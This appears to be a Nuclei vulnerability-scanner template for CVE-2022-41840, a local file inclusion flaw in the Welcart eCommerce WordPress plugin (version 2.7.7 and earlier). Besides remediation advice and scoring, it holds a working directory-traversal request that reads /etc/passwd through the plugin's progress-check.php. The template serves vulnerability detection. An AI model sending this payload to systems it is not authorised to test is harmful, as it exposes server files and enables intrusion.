id: CVE-2022-41840 info: name: Welcart eCommerce <=2.7.7 - Local File Inclusion author: theamanrawat severity: critical description: | Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. remediation: | Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve - https://nvd.nist.gov/vuln/detail/CVE-2022-41840 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 epss-score: 0.00635 epss-percentile: 0.76449 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: collne product: welcart_e-commerce framework: wordpress tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: header words: - "application/json" - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200